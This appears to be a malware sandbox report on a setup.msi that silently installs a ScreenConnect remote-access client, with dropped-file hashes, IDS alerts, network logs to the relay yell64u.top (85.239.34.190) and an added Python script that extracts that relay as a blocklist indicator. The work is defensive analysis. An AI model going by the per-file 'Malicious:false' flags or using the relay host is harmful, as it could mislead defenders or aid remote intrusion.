                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):1.7782821701958873
                                                              Encrypted:false
                                                              SSDEEP:48:M8PhRuRc06WXOCjT5Py4NC+qcq56AduNSiAUWdZq+ommXrz4RLoMrGAduNSID:jhR1UjTX+pYf7WdwLmm34Ry
                                                              MD5:6381CC5ECAF29A97B3C46473738A3B35
                                                              SHA1:E8448EB727C76E6CEA668280D7732AD6823A7386
                                                              SHA-256:2CAA7794845660F494E447DB67E56E0882849EB96727E0B34ACB459A585CA66F
                                                              SHA-512:2E859B612DBB99F8B3DEE0CCD0BAC1EFAE19ADE250F1582C72AF4BF2C6C6E1C72CFBBF1AC49F35C1DFFA4504D87A80CD79C5E6799358CF952A0281EF6956C800
                                                              Malicious:false
                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel
                                                              Category:dropped
                                                              Size (bytes):7668
                                                              Entropy (8bit):7.864444854228408
                                                              Encrypted:false
                                                              SSDEEP:192:NN78fxDBmgwVRjuzFN78fxDBmgwVRjuzFN78fxDBmgwVRjuzc:NN78dB742N78dB742N78dB74d
                                                              MD5:55A6B0132343F5FC425515F0E29A5A53
                                                              SHA1:CC8FE5C184EBB14AD6D835D8E743F4FC2678CB10
                                                              SHA-256:A6663FB9874ABA9B9C1958D2D17470B73E1C95621A503454B2D0F941F989EAA6
                                                              SHA-512:4F57298141165351CCE82CCCD9CAE456591253C9BEB753645D92B73D933F8405CD22011FC0E8C488A2CD3D3B54C7AF327F2869432EE92C1C41B0F4474D6C6BE9
                                                              Malicious:false
                                                              Preview:..................6... .......... ...00...............PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.m#x....X.rYn....R_.ds...*.*......V..x[$]..}.*..b...". ...,....*|.F`.....E[`\6...G.m..$.K...IxAb..^."....@.^..G....bK.....F.+.E.*..p......2WBk......8...p......_u.mR.6.......xs.....jHX.)l....KA..F...u_}.G.pF.`.i....K..JQ.C..cc..[..-06.d{...%TtG..'.....9.W5W.~)..Qlx.d.gT....gX.#L..4{......cG..h..$...ie.....W..)X...#o..dku..[.VQp..c?...........)..+w.p.H....I...:...r...6?....V...{.R...?.w..i......sC[..R.t!_v.A.....-kzL.8...d.(..6I.....&.R..1.....p.?.Vt..@>^....{p.s.[..c9.k~k.B....(.......%=........x6.6*:..Vu.. ......".;g..f....o}..+..n.w..%.j.0...X:.^...o....$.8@M]B..J..R.. ..a....n.<.
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):432221
                                                              Entropy (8bit):5.375176928380616
                                                              Encrypted:false
                                                              SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauv:zTtbmkExhMJCIpEra
                                                              MD5:7E49880BBE004F397878B83A3ADE2FE1
                                                              SHA1:F9BACABB066B0C8AAF2F5B42395E3DE7FFCC1F19
                                                              SHA-256:E68E9EB8CE0AB865ECA549B1AAEE0EBD8EFB26E9FBF86B5D557771228F68FAB1
                                                              SHA-512:815F3E9969D300BE5E1DD116F53D05DF13A3D450DFA8F6DE73B2076285B5F462A47C81572C7A66DDBA50CC4184F5F26459827C150187A059FB7D3C0FC83FC737
                                                              Malicious:false
                                                              Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                              Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):556
                                                              Entropy (8bit):5.037767210511845
                                                              Encrypted:false
                                                              SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOIUibO/vXbAa3xT:2dL9hK6E46YP6ovH
                                                              MD5:8731132A8C548A410408DEF9AA44CB91
                                                              SHA1:428CFDFEB1B7AF8EB4B3910C21E60A429FCF69DF
                                                              SHA-256:02B9AB1A2BC8B540D457AEBCB4B2F047DB0713C7B9A7CB994B345863AA2E2667
                                                              SHA-512:C5A6A74F706668732B2476862532BD4320C57B0509E2109F1205E94B623E31E24FAD8BB7DF17FEDC89AA661D9E55741EB2ED538EE40B9D81587C58FD3559D818
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>yell64u.top=85.239.34.190-13%2f11%2f2024%2020%3a32%3a10</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                              Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):556
                                                              Entropy (8bit):5.037767210511845
                                                              Encrypted:false
                                                              SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOIUibO/vXbAa3xT:2dL9hK6E46YP6ovH
                                                              MD5:8731132A8C548A410408DEF9AA44CB91
                                                              SHA1:428CFDFEB1B7AF8EB4B3910C21E60A429FCF69DF
                                                              SHA-256:02B9AB1A2BC8B540D457AEBCB4B2F047DB0713C7B9A7CB994B345863AA2E2667
                                                              SHA-512:C5A6A74F706668732B2476862532BD4320C57B0509E2109F1205E94B623E31E24FAD8BB7DF17FEDC89AA661D9E55741EB2ED538EE40B9D81587C58FD3559D818
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>yell64u.top=85.239.34.190-13%2f11%2f2024%2020%3a32%3a10</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
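The two ScreenConnect.ClientService.exe entries above (one "modified", one "dropped", same hashes) are the most useful artifacts in this part of the list even though the report marks them "Malicious: false": the HostToAddressMap setting records the relay host the client was built for (yell64u.top) and the address it resolved to (85.239.34.190) at a URL-encoded timestamp. The following is an added example, not code from the sandbox report or from ConnectWise, that pulls those indicators out of the .config file. SAMPLE_CONFIG is reconstructed from the preview above; the "host=ip-timestamp" layout (only one entry is visible on the page) and the day-first date (13/11/2024 cannot be month-first) are assumptions.

```python
"""Extract the relay host / IP indicator from a dropped ScreenConnect client .config.

Added example, not part of the Joe Sandbox report and not ConnectWise code.
Assumptions: the HostToAddressMap value is laid out as "host=ip-timestamp" with
one entry, the timestamp is URL-encoded, and the date is day-first.
"""
import re
import urllib.parse
import xml.etree.ElementTree as ET
from datetime import datetime
from typing import Optional

# Reconstructed from the report's preview of the dropped .config file.
SAMPLE_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
  </configSections>
  <ScreenConnect.ApplicationSettings>
    <setting name="HostToAddressMap" serializeAs="String">
      <value>yell64u.top=85.239.34.190-13%2f11%2f2024%2020%3a32%3a10</value>
    </setting>
  </ScreenConnect.ApplicationSettings>
</configuration>
"""

# host, '=', dotted-quad address, '-', then the (still URL-encoded) timestamp
_ENTRY = re.compile(r"^(?P<host>[^=\s]+)=(?P<ip>\d{1,3}(?:\.\d{1,3}){3})-(?P<when>.+)$")


def host_to_address_map(config_xml: str) -> Optional[str]:
    """Return the raw HostToAddressMap value, or None if the setting is absent."""
    root = ET.fromstring(config_xml.encode("utf-8"))
    for setting in root.iter("setting"):
        if setting.get("name") == "HostToAddressMap":
            value = setting.find("value")
            if value is not None and value.text:
                return value.text.strip()
            return None
    return None


def parse_entry(raw: str) -> dict:
    """Split one 'host=ip-timestamp' entry and URL-decode the timestamp.

    resolved_at is None when the decoded timestamp is not day-first d/m/Y H:M:S;
    that format is an assumption taken from the sample, not a documented spec.
    """
    m = _ENTRY.match(raw)
    if not m:
        raise ValueError(f"unexpected HostToAddressMap layout: {raw!r}")
    when = urllib.parse.unquote(m.group("when"))
    try:
        resolved_at = datetime.strptime(when, "%d/%m/%Y %H:%M:%S")
    except ValueError:
        resolved_at = None
    return {
        "host": m.group("host"),
        "ip": m.group("ip"),
        "resolved_at_raw": when,
        "resolved_at": resolved_at,
    }


def extract_relay_iocs(config_xml: str) -> Optional[dict]:
    """End-to-end: .config text -> parsed relay entry, or None if not present."""
    raw = host_to_address_map(config_xml)
    return parse_entry(raw) if raw else None


def as_ioc_lines(entry: dict) -> list:
    """Flat indicator lines suitable for a blocklist or a hunt query."""
    return [f"domain:{entry['host']}", f"ip:{entry['ip']}"]


if __name__ == "__main__":
    entry = extract_relay_iocs(SAMPLE_CONFIG)
    print(entry)
    print("\n".join(as_ioc_lines(entry)))
```

The point of keeping resolved_at_raw alongside the parsed datetime is that the timestamp is written in the victim machine's locale, so a hunt over many hosts should match on the string and only parse once the format is confirmed; the domain and IP are what belong in the blocklist.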
                                                              Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1590
                                                              Entropy (8bit):5.363907225770245
                                                              Encrypted:false
                                                              SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                              MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                              SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                              SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                              SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                              Malicious:false
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):1.7782821701958873
                                                              Encrypted:false
                                                              SSDEEP:48:M8PhRuRc06WXOCjT5Py4NC+qcq56AduNSiAUWdZq+ommXrz4RLoMrGAduNSID:jhR1UjTX+pYf7WdwLmm34Ry
                                                              MD5:6381CC5ECAF29A97B3C46473738A3B35
                                                              SHA1:E8448EB727C76E6CEA668280D7732AD6823A7386
                                                              SHA-256:2CAA7794845660F494E447DB67E56E0882849EB96727E0B34ACB459A585CA66F
                                                              SHA-512:2E859B612DBB99F8B3DEE0CCD0BAC1EFAE19ADE250F1582C72AF4BF2C6C6E1C72CFBBF1AC49F35C1DFFA4504D87A80CD79C5E6799358CF952A0281EF6956C800
                                                              Malicious:false
                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):1.7782821701958873
                                                              Encrypted:false
                                                              SSDEEP:48:M8PhRuRc06WXOCjT5Py4NC+qcq56AduNSiAUWdZq+ommXrz4RLoMrGAduNSID:jhR1UjTX+pYf7WdwLmm34Ry
                                                              MD5:6381CC5ECAF29A97B3C46473738A3B35
                                                              SHA1:E8448EB727C76E6CEA668280D7732AD6823A7386
                                                              SHA-256:2CAA7794845660F494E447DB67E56E0882849EB96727E0B34ACB459A585CA66F
                                                              SHA-512:2E859B612DBB99F8B3DEE0CCD0BAC1EFAE19ADE250F1582C72AF4BF2C6C6E1C72CFBBF1AC49F35C1DFFA4504D87A80CD79C5E6799358CF952A0281EF6956C800
                                                              Malicious:false
                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):0.0690752581717308
                                                              Encrypted:false
                                                              SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOeoGzpxrGNgGyVky6l3X:2F0i8n0itFzDHFeoGzjPE3X
                                                              MD5:55346CF55DF51C483C9E6F0D7483AFA8
                                                              SHA1:B90A551D8DDF776D2A5E17813F54A867ECDBF460
                                                              SHA-256:D4FA5ABE7AB47B9BF42F3453FE11931EB47760AEFA519B989169066435F3BF75
                                                              SHA-512:1B707F4FAB1BD24F07A7ECDDCBF8823846EDD8442F2238E0FA19531F5E9C29919E0F654630F933C341F23AEA37E543E1B6B121A4BD5849545A1D6C235F2B434A
                                                              Malicious:false
                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):1.404588811757629
                                                              Encrypted:false
                                                              SSDEEP:48:repudGMLFXO1T5bUAy4NC+qcq56AduNSiAUWdZq+ommXrz4RLoMrGAduNSID:6pKoTdf+pYf7WdwLmm34Ry
                                                              MD5:C7114F562BC601FF630C6624B7FF87AE
                                                              SHA1:169A7AC109B3F5C54B964703BFF4D3542DBCDCD1
                                                              SHA-256:37975954B216DB95D2306DA7EDEF36005D6D777192D6CCC7B7CDBC9432602998
                                                              SHA-512:DD347FB5FAA49D7A9FD40935B19EED1CAD746213C1F717F4C3F68F480AC460FDBA8F3460CDC931D8D85AB904D90FD7878D8294DB833D399F6A4B466457D92C4B
                                                              Malicious:false
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):1.404588811757629
                                                              Encrypted:false
                                                              SSDEEP:48:repudGMLFXO1T5bUAy4NC+qcq56AduNSiAUWdZq+ommXrz4RLoMrGAduNSID:6pKoTdf+pYf7WdwLmm34Ry
                                                              MD5:C7114F562BC601FF630C6624B7FF87AE
                                                              SHA1:169A7AC109B3F5C54B964703BFF4D3542DBCDCD1
                                                              SHA-256:37975954B216DB95D2306DA7EDEF36005D6D777192D6CCC7B7CDBC9432602998
                                                              SHA-512:DD347FB5FAA49D7A9FD40935B19EED1CAD746213C1F717F4C3F68F480AC460FDBA8F3460CDC931D8D85AB904D90FD7878D8294DB833D399F6A4B466457D92C4B
                                                              Malicious:false
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):69632
                                                              Entropy (8bit):0.22547669897639744
                                                              Encrypted:false
                                                              SSDEEP:48:ODBAduNS3qcq56AduNSiAUWdZq+ommXrz4RLoMr1up40:YxpYf7WdwLmm34Rw
                                                              MD5:684DB2F84E0877AE894F33B40B49C7AE
                                                              SHA1:BB66CC332B24F23BE5FC2EE51579DB50348F4A74
                                                              SHA-256:E8F16D7B939E650A2DF3E7D878DD7977C2DA5FCAE69A45BEDC2B8819F2FE9675
                                                              SHA-512:4E4417C736D7A52599A250B222CA3FACFF89DB00C9FC727EE2A43CB84FF273D02393538D55CBC583AC8D64A3030A3875CB30255AA139F7ED25FCF374CDE03031
                                                              Malicious:false
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):1.404588811757629
                                                              Encrypted:false
                                                              SSDEEP:48:repudGMLFXO1T5bUAy4NC+qcq56AduNSiAUWdZq+ommXrz4RLoMrGAduNSID:6pKoTdf+pYf7WdwLmm34Ry
                                                              MD5:C7114F562BC601FF630C6624B7FF87AE
                                                              SHA1:169A7AC109B3F5C54B964703BFF4D3542DBCDCD1
                                                              SHA-256:37975954B216DB95D2306DA7EDEF36005D6D777192D6CCC7B7CDBC9432602998
                                                              SHA-512:DD347FB5FAA49D7A9FD40935B19EED1CAD746213C1F717F4C3F68F480AC460FDBA8F3460CDC931D8D85AB904D90FD7878D8294DB833D399F6A4B466457D92C4B
                                                              Malicious:false
                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {64D6109D-BB46-4239-08D9-EC110E53E92E}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                              Entropy (8bit):7.966821211716796
                                                              TrID:
                                                              • Microsoft Windows Installer (60509/1) 57.88%
                                                              • ClickyMouse macro set (36024/1) 34.46%
                                                              • Generic OLE2 / Multistream Compound File (8008/1) 7.66%
                                                              File name:setup.msi
                                                              File size:13'422'592 bytes
                                                              MD5:ed78bad542629e617ae49dfeffabcfcc
                                                              SHA1:bf5efe919b3c3561c433d9d4cd0f323a9359017e
                                                              SHA256:86231cca7231e3905a7317d07350c19f3923e24f34732c0aa6c022599913b1a3
                                                              SHA512:45157229e4e2f6c5730ed1d1a233928538d7c7c71f549d8552cbe077f6dc22f7cdc390631696e8024c443b69979d8b4d8983142b6b93375ece5b4f4f4609aa3f
                                                              SSDEEP:196608:h53JLR3LGMLiW35+53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53JZ:bTiuyTXTtTPTkTzT
                                                              TLSH:7CD6233163F88868E5B75BBDED7684A06836BC61DE22D11F42697A0C1A70F409B73773
                                                              Icon Hash:2d2e3797b32b2b99
Suricata IDS alerts:
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-13T21:32:24.311224+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.4 | 49731 | TCP
2024-11-13T21:33:02.882749+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.4 | 49737 | TCP

TCP packets:
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 13, 2024 21:32:11.251332045 CET | 49730 | 8880 | 192.168.2.4 | 85.239.34.190
Nov 13, 2024 21:32:11.256730080 CET | 8880 | 49730 | 85.239.34.190 | 192.168.2.4
Nov 13, 2024 21:32:11.257474899 CET | 49730 | 8880 | 192.168.2.4 | 85.239.34.190
Nov 13, 2024 21:32:11.889180899 CET | 49730 | 8880 | 192.168.2.4 | 85.239.34.190
Nov 13, 2024 21:32:11.894275904 CET | 8880 | 49730 | 85.239.34.190 | 192.168.2.4
Nov 13, 2024 21:32:12.164418936 CET | 8880 | 49730 | 85.239.34.190 | 192.168.2.4
Nov 13, 2024 21:32:12.188079119 CET | 49730 | 8880 | 192.168.2.4 | 85.239.34.190
Nov 13, 2024 21:32:12.193197966 CET | 8880 | 49730 | 85.239.34.190 | 192.168.2.4
Nov 13, 2024 21:32:12.473974943 CET | 8880 | 49730 | 85.239.34.190 | 192.168.2.4
Nov 13, 2024 21:32:12.475430012 CET | 8880 | 49730 | 85.239.34.190 | 192.168.2.4
Nov 13, 2024 21:32:12.475567102 CET | 49730 | 8880 | 192.168.2.4 | 85.239.34.190
Nov 13, 2024 21:32:13.114809990 CET | 49730 | 8880 | 192.168.2.4 | 85.239.34.190
Nov 13, 2024 21:32:13.114908934 CET | 49730 | 8880 | 192.168.2.4 | 85.239.34.190
Nov 13, 2024 21:32:13.119790077 CET | 8880 | 49730 | 85.239.34.190 | 192.168.2.4
Nov 13, 2024 21:32:13.119807959 CET | 8880 | 49730 | 85.239.34.190 | 192.168.2.4
Nov 13, 2024 21:32:13.119820118 CET | 8880 | 49730 | 85.239.34.190 | 192.168.2.4
Nov 13, 2024 21:32:13.120011091 CET | 8880 | 49730 | 85.239.34.190 | 192.168.2.4
Nov 13, 2024 21:32:13.120832920 CET | 8880 | 49730 | 85.239.34.190 | 192.168.2.4
Nov 13, 2024 21:32:14.206291914 CET | 8880 | 49730 | 85.239.34.190 | 192.168.2.4
Nov 13, 2024 21:32:14.261883020 CET | 49730 | 8880 | 192.168.2.4 | 85.239.34.190
Nov 13, 2024 21:33:14.215080023 CET | 49730 | 8880 | 192.168.2.4 | 85.239.34.190
Nov 13, 2024 21:33:14.220591068 CET | 8880 | 49730 | 85.239.34.190 | 192.168.2.4

UDP packets:
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 13, 2024 21:32:10.381710052 CET | 60224 | 53 | 192.168.2.4 | 1.1.1.1
Nov 13, 2024 21:32:11.053494930 CET | 53 | 60224 | 1.1.1.1 | 192.168.2.4

DNS queries:
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 13, 2024 21:32:10.381710052 CET | 192.168.2.4 | 1.1.1.1 | 0xa143 | Standard query (0) | yell64u.top | A (IP address) | IN (0x0001) | false

DNS answers:
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 13, 2024 21:32:11.053494930 CET | 1.1.1.1 | 192.168.2.4 | 0xa143 | No error (0) | yell64u.top | (none) | 85.239.34.190 | A (IP address) | IN (0x0001) | false

                                                              Target ID:0
                                                              Start time:15:32:05
                                                              Start date:13/11/2024
                                                              Path:C:\Windows\System32\msiexec.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\setup.msi"
                                                              Imagebase:0x7ff7c26e0000
                                                              File size:69'632 bytes
                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:1
                                                              Start time:15:32:05
                                                              Start date:13/11/2024
                                                              Path:C:\Windows\System32\msiexec.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\msiexec.exe /V
                                                              Imagebase:0x7ff7c26e0000
                                                              File size:69'632 bytes
                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:2
                                                              Start time:15:32:05
                                                              Start date:13/11/2024
                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                              Wow64 process (32bit):true
